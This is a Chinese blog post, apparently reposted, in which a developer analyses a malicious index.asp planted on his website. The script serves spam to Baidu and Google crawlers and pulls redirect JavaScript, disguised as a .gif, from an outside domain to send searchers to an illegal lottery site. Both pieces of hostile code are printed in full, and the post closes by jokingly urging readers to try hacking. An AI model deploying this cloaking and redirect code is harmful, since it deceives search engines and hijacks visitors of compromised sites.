搜索引擎欺骗病毒的一些研究

编程语言 2018-05-13 12:26:27 阅读次数: 0
   之前网站上有一个专题总是被百度收录成非法彩票信息,打开网页看正常,页面源代码也查找不到非法彩票的相关字眼,甚是奇怪,未果。今日领导又提及此事,便不知如何是好,只能硬着头皮彻头彻尾的仔细寻找,更新cdn,杀毒软件扫描也正常,正在绝望之际,发现目录下多了个脚本文件index.asp。暗喜,原来罪魁祸首在此。把它rename,在用搜索抓取模拟器测试,正常。

    下面兴趣之余,打开文件来研究。 

<%
Function check(user_agent)
    allow_agent=split("Baiduspider,Googlebot",",")
    check_agent=false
    For agents=lbound(allow_agent) to ubound(allow_agent)
        If instr(user_agent,allow_agent(agents))>0 then
            check_agent=true
            exit for
        end if 
    Next
    check=check_agent
End function
canshu=Request.ServerVariables("query_string")
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
Refer=Request.ServerVariables("HTTP_REFERER")
If check(user_agent)=true then
%>
<!--#include file="../a_images/pic.jpg"-->
<%else%>
<%
Refer=Request.ServerVariables("HTTP_REFERER")
if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%>
<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>
<%
response.end
end if%>
<!--#include file="index.shtml"-->
<%end if%>




    因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。  allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。

    但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。

    以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。

    代码如下: 

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){
if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){
window.location.href="http://www.58887888.net./";
}
else{
window.location.href="http://www.58887888.net./index2.htm";
}
}



    上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。

猜你喜欢

转载自callmeali.iteye.com/blog/1401449
今日推荐
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
周排行
女程序员是这样被恶搞的
B/S 和 C/S 的优缺点
vector一直申请会怎样?
座头鲸识别比赛(Humpback Whale Identification)总结
Linux高性能服务器编程——I/O复用 select
Mysql连接数据库(当包使用)
通过URI获取的文件路径为null的解决方法
1022-Primes on Interval(素数筛选+二分查找) ZCMU
Python出现: TypeError: expected string or buffer
bzoj2434: [Noi2011]阿狸的打字机 ac自动机+树状数组
每日归档
更多
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022